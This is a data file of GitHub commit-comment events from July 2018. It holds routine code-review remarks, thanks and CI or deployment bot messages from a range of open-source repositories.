{"id":"8029035400","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859587,"position":59,"line":461,"path":"assembl/tests/views_tests/test_graphql_user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:47:12Z","updated_at":"2018-07-27T14:47:12Z","author_association":"MEMBER","body":"Remove this comment, please"}},"created_at":"2018-07-27T14:47:12Z"}
{"id":"8029038673","type":"CommitCommentEvent","actor":{"login":"smolse"},"repo":{"name":"edasque/DynamoDBtoCSV"},"payload":{"comment":{"id":29859596,"position":null,"line":null,"path":null,"commit_id":"3afcb35b554f8f8abe75d77ffde5e8d70d95790b","created_at":"2018-07-27T14:47:45Z","updated_at":"2018-07-27T14:47:45Z","author_association":"CONTRIBUTOR","body":"@edasque, have you tried [DynamoDB Local](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DynamoDBLocal.html) provided by AWS? E.g. I have been using [cnadiminti/dynamodb-local](https://hub.docker.com/r/cnadiminti/dynamodb-local/) docker image a lot and its really helpful."}},"created_at":"2018-07-27T14:47:45Z"}
{"id":"8029043648","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29859608,"position":9,"line":9,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T14:48:37Z","updated_at":"2018-07-27T14:48:37Z","author_association":"OWNER","body":"Instantiate that class, using the argument node as constructor arguments."}},"created_at":"2018-07-27T14:48:37Z"}
{"id":"8029045940","type":"CommitCommentEvent","actor":{"login":"MrFr4g"},"repo":{"name":"lilfuchs/esx_drp_garage"},"payload":{"comment":{"id":29859622,"position":61,"line":53,"path":"server.lua","commit_id":"0aad745fbe974c1fe1cf14e597f7b7b25a62e785","created_at":"2018-07-27T14:49:00Z","updated_at":"2018-07-27T14:49:00Z","author_association":"NONE","body":"(\"UPDATE owned_vehicles SET state =@state WHERE plate=@plate\",{['@state'] = state , ['@plate'] = v.plate})"}},"created_at":"2018-07-27T14:49:00Z"}
{"id":"8029054296","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29859639,"position":8,"line":8,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T14:50:16Z","updated_at":"2018-07-27T14:50:16Z","author_association":"OWNER","body":"Instantiate that class, using the argument node as constructor arguments."}},"created_at":"2018-07-27T14:50:16Z"}
{"id":"8029054365","type":"CommitCommentEvent","actor":{"login":"fizga"},"repo":{"name":"tumugin/WiringOP"},"payload":{"comment":{"id":29859640,"position":null,"line":null,"path":null,"commit_id":"9b688ae1605dccb779a981307c730dc415c0a222","created_at":"2018-07-27T14:50:16Z","updated_at":"2018-07-27T14:50:16Z","author_association":"NONE","body":"i have the same problem with opi pc2\r\nan issue ?? "}},"created_at":"2018-07-27T14:50:16Z"}
{"id":"8029055843","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29859642,"position":null,"line":null,"path":null,"commit_id":"0af9cc441376e6a216e15efdd84ad729d46b6e59","created_at":"2018-07-27T14:50:29Z","updated_at":"2018-07-27T14:50:29Z","author_association":"MEMBER","body":"You apparently move in the wrong repo.\r\nhttps://github.com/artix-linux/packages/commit/c366064912097967339f0d088d84731018606366\r\n\r\nPlease more focus if you do kernel."}},"created_at":"2018-07-27T14:50:29Z"}
{"id":"8029056947","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859643,"position":123,"line":2356,"path":"imgui_draw.cpp","commit_id":"0321aeb7480263451c7f9a338d95b55d3efebc8b","created_at":"2018-07-27T14:50:40Z","updated_at":"2018-07-27T14:50:40Z","author_association":"OWNER","body":"Totally forgot about those math wrappers. I intended to merge this once it was well-tested, but maybe I'll scrap this altogether and use the simpler code you suggested on ocornut/imgui#1962.\r\n\r\nThanks for the float/double heads-up. I'll switch to extra-pedantic compile flags so stuff like that isn't an issue :)"}},"created_at":"2018-07-27T14:50:40Z"}
{"id":"8029062153","type":"CommitCommentEvent","actor":{"login":"hbbdyzf"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29859659,"position":null,"line":null,"path":null,"commit_id":"a4c9e4491d7491d2fed2a983f757a1e84ebc396c","created_at":"2018-07-27T14:51:28Z","updated_at":"2018-07-27T14:51:28Z","author_association":"NONE","body":"hello, this factor is wrong \" elseif strcmp(mode,'sch')  K = (2*l+1)/(4*pi)*sqrt(factorial(l-m)/(factorial(l+m))); schmidt factor has not (2*l+1)/(4*pi)*"}},"created_at":"2018-07-27T14:51:28Z"}
{"id":"8029064283","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29859662,"position":23,"line":23,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T14:51:49Z","updated_at":"2018-07-27T14:51:49Z","author_association":"OWNER","body":"Any sub-node of a UI Component that’s not named argument is considered a child node of the parent object."}},"created_at":"2018-07-27T14:51:49Z"}
{"id":"8029065188","type":"CommitCommentEvent","actor":{"login":"josepdaniel"},"repo":{"name":"josepdaniel/josepdaniel.github.io"},"payload":{"comment":{"id":29859666,"position":null,"line":null,"path":null,"commit_id":"049733a59171fc96a81ae1f1cf0248ee45c4e9bd","created_at":"2018-07-27T14:51:59Z","updated_at":"2018-07-27T14:51:59Z","author_association":"OWNER","body":"Adding back in main.c"}},"created_at":"2018-07-27T14:51:59Z"}
{"id":"8029065873","type":"CommitCommentEvent","actor":{"login":"mineo"},"repo":{"name":"metabrainz/picard-website"},"payload":{"comment":{"id":29859668,"position":null,"line":null,"path":null,"commit_id":"ed6516cbe8b98580fb3b8f20a6d6c56eda299d4e","created_at":"2018-07-27T14:52:06Z","updated_at":"2018-07-27T14:52:06Z","author_association":"MEMBER","body":"This is missing the update of the version number for source downloads."}},"created_at":"2018-07-27T14:52:06Z"}
{"id":"8029066322","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29859669,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T14:52:11Z","updated_at":"2018-07-27T14:52:11Z","author_association":"NONE","body":"I was just thinking, maybe we could take a template argument a function or a functional for the removal operation?\r\n\r\nThis would make it especially cool so we could use it with different objects to IReferenceCounted.\r\n\r\nBut its actually very necessary for things like ITexture which cannot be dropped, they have to be IVideoDriver::remove*ed."}},"created_at":"2018-07-27T14:52:11Z"}
{"id":"8029067494","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29859671,"position":13,"line":12,"path":"Blog/view/adminhtml/layout/blog_posts_index.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T14:52:22Z","updated_at":"2018-07-27T14:52:22Z","author_association":"OWNER","body":"A ui_component‘s XML node name is used to lookup PHP classes to instantiate"}},"created_at":"2018-07-27T14:52:22Z"}
{"id":"8029067551","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859672,"position":14,"line":419,"path":"assembl/graphql/schema.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:52:23Z","updated_at":"2018-07-27T14:52:23Z","author_association":"CONTRIBUTOR","body":"please use snake case, you should modify DeleteUserInformation too. graphene is transforming this to camelcase automatically."}},"created_at":"2018-07-27T14:52:23Z"}
{"id":"8029068440","type":"CommitCommentEvent","actor":{"login":"Eris11dib"},"repo":{"name":"SuperKali/HealthUI"},"payload":{"comment":{"id":29859675,"position":null,"line":null,"path":null,"commit_id":"a67245922089eae962e4975bdbe193ee9137b243","created_at":"2018-07-27T14:52:31Z","updated_at":"2018-07-27T14:52:31Z","author_association":"NONE","body":"try to tab manually"}},"created_at":"2018-07-27T14:52:31Z"}
{"id":"8029071048","type":"CommitCommentEvent","actor":{"login":"urbf"},"repo":{"name":"ldqk/softs"},"payload":{"comment":{"id":29859681,"position":null,"line":null,"path":null,"commit_id":"3d968bb76cbb981d93fca9ba6eaec16f707e122f","created_at":"2018-07-27T14:52:59Z","updated_at":"2018-07-27T14:52:59Z","author_association":"NONE","body":"xiexie"}},"created_at":"2018-07-27T14:52:59Z"}
{"id":"8029073775","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859683,"position":6,"line":1022,"path":"imgui_draw.cpp","commit_id":"fd09b3ad0321fb0134039b13d0398d8462751ee2","created_at":"2018-07-27T14:53:27Z","updated_at":"2018-07-27T14:53:27Z","author_association":"OWNER","body":"Kinda suspected this was out of place :) Do you think it would be okay to put this code as-is in imgui.cpp or the interface should be different? (imgui.cpp would be accessing the drawlist's _data->TexUvRoundedCorner)"}},"created_at":"2018-07-27T14:53:27Z"}
{"id":"8029074528","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29859686,"position":null,"line":null,"path":null,"commit_id":"d2d99d787bd7e6dd892ec47a0b08d83046a4d384","created_at":"2018-07-27T14:53:34Z","updated_at":"2018-07-27T14:53:34Z","author_association":"COLLABORATOR","body":"html button are really better than input ;)"}},"created_at":"2018-07-27T14:53:34Z"}
{"id":"8029074842","type":"CommitCommentEvent","actor":{"login":"hamdo5"},"repo":{"name":"btsimonh/826-x-ip-camera"},"payload":{"comment":{"id":29859687,"position":null,"line":null,"path":null,"commit_id":"57735ac83063cbe00155af01b0c83b42141923cb","created_at":"2018-07-27T14:53:38Z","updated_at":"2018-07-27T14:53:38Z","author_association":"NONE","body":"شكرا جزيلا"}},"created_at":"2018-07-27T14:53:38Z"}
{"id":"8029075680","type":"CommitCommentEvent","actor":{"login":"gfgtdf"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29859692,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-27T14:53:46Z","updated_at":"2018-07-27T14:53:46Z","author_association":"CONTRIBUTOR","body":"You forgot to overwrite the loadstring function which is an alias for load."}},"created_at":"2018-07-27T14:53:46Z"}
{"id":"8029076637","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859694,"position":16,"line":43,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:53:56Z","updated_at":"2018-07-27T14:53:56Z","author_association":"CONTRIBUTOR","body":"The resolver are not needed, but you can't use only_fields actually, we want our custom DateTime field to fix an issue with timezone."}},"created_at":"2018-07-27T14:53:56Z"}
{"id":"8029088189","type":"CommitCommentEvent","actor":{"login":"mohamedzayed92"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859723,"position":16,"line":43,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:55:54Z","updated_at":"2018-07-27T14:55:54Z","author_association":"CONTRIBUTOR","body":"@ayyazdaniaryan  yeah sure... i will add the docs as soon as we merge the branch, as this branch was started before we add the docstrings file"}},"created_at":"2018-07-27T14:55:54Z"}
{"id":"8029091581","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29859731,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T14:56:29Z","updated_at":"2018-07-27T14:56:29Z","author_association":"NONE","body":"Or better, always make the cache take an IIrrlichtDevice* pointer in the constructor and store it as a private var.\r\n\r\nThen make the `removeByKey` and similar functions reference an unimplemented `dispose(it->second)` function which would be implemented differently in partial template specializations of the cache\r\n\r\nWe need to think of different ways to resolve this problem."}},"created_at":"2018-07-27T14:56:29Z"}
{"id":"8029092258","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859733,"position":23,"line":50,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:56:35Z","updated_at":"2018-07-27T14:56:35Z","author_association":"CONTRIBUTOR","body":"Why do we have `or False` here. The field can't be null normally."}},"created_at":"2018-07-27T14:56:35Z"}
{"id":"8029099693","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29859744,"position":23,"line":1148,"path":"application/helpers/SurveyRuntimeHelper.php","commit_id":"669c5b849f00e5ba1893158dda117f3e8ed4ddca","created_at":"2018-07-27T14:57:52Z","updated_at":"2018-07-27T14:57:52Z","author_association":"COLLABORATOR","body":"We don't have it in aSurveyInfo ? If not i think it's better to use `Survey::model()->findByPk($sid)->getHasTokensTable();`"}},"created_at":"2018-07-27T14:57:52Z"}
{"id":"8029099801","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859745,"position":33,"line":285,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:57:53Z","updated_at":"2018-07-27T14:57:53Z","author_association":"CONTRIBUTOR","body":"Yes, get the id for the authenticated user. And remove the `ByUser` is the mutation name."}},"created_at":"2018-07-27T14:57:53Z"}
{"id":"8029100777","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29859749,"position":null,"line":null,"path":null,"commit_id":"0e9b688ce8fbe0ac98cc708c4848949dfe6b6441","created_at":"2018-07-27T14:58:04Z","updated_at":"2018-07-27T14:58:04Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [ruby3794](https://ruby3794-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/gandi](https://ruby3794-static-docs.pantheonsite.io/docs/gandi)\n"}},"created_at":"2018-07-27T14:58:04Z"}
{"id":"8029102541","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29859752,"position":null,"line":null,"path":null,"commit_id":"3a881280bd843bab21b070b54ebf0db6aa36191e","created_at":"2018-07-27T14:58:22Z","updated_at":"2018-07-27T14:58:22Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [ruby3794](https://ruby3794-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/gandi](https://ruby3794-static-docs.pantheonsite.io/docs/gandi)\n"}},"created_at":"2018-07-27T14:58:22Z"}
{"id":"8029106942","type":"CommitCommentEvent","actor":{"login":"huihui7987"},"repo":{"name":"huihui7987/faceai"},"payload":{"comment":{"id":29859760,"position":null,"line":null,"path":null,"commit_id":"e3efc61557326e40fb9b588d04f3565c5b946082","created_at":"2018-07-27T14:59:08Z","updated_at":"2018-07-27T14:59:08Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-27T14:59:08Z"}
{"id":"8029109933","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859764,"position":49,"line":301,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:59:36Z","updated_at":"2018-07-27T14:59:36Z","author_association":"CONTRIBUTOR","body":"I think those 3 variables are unused."}},"created_at":"2018-07-27T14:59:36Z"}
{"id":"8029111925","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29859766,"position":null,"line":null,"path":null,"commit_id":"403ccdea1e510dd03eedfdaf07b3a83f5e9f5d1e","created_at":"2018-07-27T14:59:56Z","updated_at":"2018-07-27T14:59:56Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-67](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-67).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-67-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T14:59:56Z"}
{"id":"8029113833","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29859770,"position":108,"line":108,"path":"event_loop.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-27T15:00:14Z","updated_at":"2018-07-27T15:00:14Z","author_association":"OWNER","body":"Thanks to your comments I realized we can save a call to `Clock::now()` in the main loop when a file descriptor gets removed from epoll. This happens several times for every connection, whether it's closed normally or abnormally."}},"created_at":"2018-07-27T15:00:14Z"}
{"id":"8029115655","type":"CommitCommentEvent","actor":{"login":"varemenos"},"repo":{"name":"ellipsis/ellipsis"},"payload":{"comment":{"id":29859779,"position":13,"line":136,"path":"src/fs.bash","commit_id":"2fcf4e92f4c6fc24554dcd3bed50af6411ffd0fb","created_at":"2018-07-27T15:00:30Z","updated_at":"2018-07-27T15:00:30Z","author_association":"NONE","body":"Hey @groggemans, I just remembered about the conversation about this commit we had last year."}},"created_at":"2018-07-27T15:00:30Z"}
{"id":"8029118194","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859785,"position":66,"line":318,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:00:57Z","updated_at":"2018-07-27T15:00:57Z","author_association":"CONTRIBUTOR","body":"please add a `db.flush()` at the end of a mutation otherwise we will have hard to debug failing tests."}},"created_at":"2018-07-27T15:00:57Z"}
{"id":"8029122051","type":"CommitCommentEvent","actor":{"login":"aksv0003"},"repo":{"name":"aksv0003/local-project"},"payload":{"comment":{"id":29859793,"position":null,"line":null,"path":null,"commit_id":"60c1bf209f350c6a01c1b9527613e92d34cbccd8","created_at":"2018-07-27T15:01:37Z","updated_at":"2018-07-27T15:01:37Z","author_association":"OWNER","body":"added"}},"created_at":"2018-07-27T15:01:37Z"}
{"id":"8029122678","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859794,"position":108,"line":360,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:01:44Z","updated_at":"2018-07-27T15:01:44Z","author_association":"CONTRIBUTOR","body":"wrong class here"}},"created_at":"2018-07-27T15:01:44Z"}
{"id":"8029125446","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29859797,"position":14,"line":24,"path":"tests/test_metrics.py","commit_id":"87d6a0d29097855617a3de7b85e365034f37b60f","created_at":"2018-07-27T15:02:14Z","updated_at":"2018-07-27T15:02:14Z","author_association":"OWNER","body":"I added a test on master that tested that this setting was respected. It seems to have been lost in the merge. Can you look into it?"}},"created_at":"2018-07-27T15:02:14Z"}
{"id":"8029126483","type":"CommitCommentEvent","actor":{"login":"DavisVaughan"},"repo":{"name":"tidyverse/glue"},"payload":{"comment":{"id":29859798,"position":11,"line":32,"path":"tests/testthat/test-sql.R","commit_id":"ea29e09fc6f685c9d7c33068e5017c1c14544c46","created_at":"2018-07-27T15:02:26Z","updated_at":"2018-07-27T15:02:26Z","author_association":"NONE","body":"`columm` is spelled wrong if you want to be picky but I don't think it matters"}},"created_at":"2018-07-27T15:02:26Z"}
{"id":"8029132733","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29859808,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T15:03:34Z","updated_at":"2018-07-27T15:03:34Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2988 tests passed, 11 test warnings)\n\nMessages:\n\n * 26 tests had: EIO diffs.\n * 13 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 10 tests had: Table small diffs.\n * 3 tests had: ERR diffs.\n * 13 tests had: ESO big diffs.\n * 14 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 628\n * Failed: 15\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.5%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T15:03:34Z"}
{"id":"8029136937","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859816,"position":51,"line":1026,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T15:04:20Z","updated_at":"2018-07-27T15:04:20Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-27T15:04:20Z"}
{"id":"8029138035","type":"CommitCommentEvent","actor":{"login":"NasrinAsadi"},"repo":{"name":"NasrinAsadi/zone-identification"},"payload":{"comment":{"id":29859817,"position":null,"line":null,"path":null,"commit_id":"b34dcdca1ad79162e5a7dd2e3f27927095b1c8af","created_at":"2018-07-27T15:04:32Z","updated_at":"2018-07-27T15:04:32Z","author_association":"OWNER","body":"sample input data"}},"created_at":"2018-07-27T15:04:32Z"}
{"id":"8029138108","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29859818,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-27T15:04:33Z","updated_at":"2018-07-27T15:04:33Z","author_association":"MEMBER","body":"Maybe GCC has hacks to deal with it, but it and adds an annoying special case to our general library that gumms up everything. `cc-wrapper` certainly needs to help GCC find it's other own libs, Clang on Linux ends up requiring all of GCC just for `crt*.o`, Clang with libstdc++ isa hot mess, https://github.com/NixOS/nixpkgs/pull/38632 won't work because the env hooks won't pick up all the libs, https://github.com/NixOS/nixpkgs/pull/31414 also won't work for the same reason, Linux and Darwin bootstrapping has to think harder about `allowedRequisites` because tools and libraries are mixed, and Linux and GCC-based cross compilation has to have completely different bootstrapping (one of the few remaining issues called out in https://github.com/NixOS/nixpkgs/issues/10874).\r\n\r\nIt's much more maintainable to have up individual packages than sap the overall infrastructure."}},"created_at":"2018-07-27T15:04:33Z"}
{"id":"8029151089","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859838,"position":7,"line":734,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:06:55Z","updated_at":"2018-07-27T15:06:55Z","author_association":"CONTRIBUTOR","body":"I would have used the creation_date from the AcceptPrivacyPolicyOnDiscussion action instead of those added fields."}},"created_at":"2018-07-27T15:06:55Z"}
{"id":"8029154957","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859848,"position":17,"line":775,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:07:38Z","updated_at":"2018-07-27T15:07:38Z","author_association":"CONTRIBUTOR","body":"It really bugs me that it's returning different types, a datetime or boolean, why the `or False`?"}},"created_at":"2018-07-27T15:07:38Z"}
{"id":"8029160655","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859856,"position":60,"line":1035,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T15:08:39Z","updated_at":"2018-07-27T15:08:39Z","author_association":"OWNER","body":"Sounds like locals give the compiler more freedom. Added a note!"}},"created_at":"2018-07-27T15:08:39Z"}
{"id":"8029160977","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29859857,"position":15,"line":27,"path":"src/otrng_parse.c","commit_id":"dde5316e0930b265dce21435c7b98245b121dc1f","created_at":"2018-07-27T15:08:42Z","updated_at":"2018-07-27T15:08:42Z","author_association":"CONTRIBUTOR","body":"The thing is, the to_display method is not avaiable because is coupled with response in libotr. So we took what is the readable part and put here. You think is better to just get the message and re-print this in the screen again the way it comes?"}},"created_at":"2018-07-27T15:08:42Z"}
{"id":"8029161931","type":"CommitCommentEvent","actor":{"login":"franciscod"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29859860,"position":67,"line":1042,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T15:08:53Z","updated_at":"2018-07-27T15:08:53Z","author_association":"OWNER","body":"404 not found, already refactored :stuck_out_tongue_winking_eye: "}},"created_at":"2018-07-27T15:08:53Z"}
{"id":"8029162072","type":"CommitCommentEvent","actor":{"login":"kamilgregorczyk"},"repo":{"name":"jankubierecki/UEKPartnership"},"payload":{"comment":{"id":29859861,"position":5,"line":11,"path":"company/models.py","commit_id":"9a833d5ec65fee246bfb71a29ebf5ff82e44c1dd","created_at":"2018-07-27T15:08:54Z","updated_at":"2018-07-27T15:08:54Z","author_association":"COLLABORATOR","body":"EmailFIeld"}},"created_at":"2018-07-27T15:08:54Z"}
{"id":"8029162336","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29859862,"position":18,"line":19,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-27T15:08:57Z","updated_at":"2018-07-27T15:08:57Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-27T15:08:57Z"}
{"id":"8029162596","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29859864,"position":48,"line":20,"path":"src/parse.c","commit_id":"ced8733453f9595ca6b876728fb540911b405f9b","created_at":"2018-07-27T15:09:00Z","updated_at":"2018-07-27T15:09:00Z","author_association":"CONTRIBUTOR","body":"Ok Thanks"}},"created_at":"2018-07-27T15:09:00Z"}
{"id":"8029164872","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29859867,"position":11,"line":13,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-27T15:09:25Z","updated_at":"2018-07-27T15:09:25Z","author_association":"CONTRIBUTOR","body":"We already solved this!"}},"created_at":"2018-07-27T15:09:25Z"}
{"id":"8029165501","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29859868,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T15:09:31Z","updated_at":"2018-07-27T15:09:31Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T15:09:31Z"}
{"id":"8029165521","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859869,"position":6,"line":733,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T15:09:31Z","updated_at":"2018-07-27T15:09:31Z","author_association":"MEMBER","body":"These two rejected columns aren't part of the migration though"}},"created_at":"2018-07-27T15:09:31Z"}
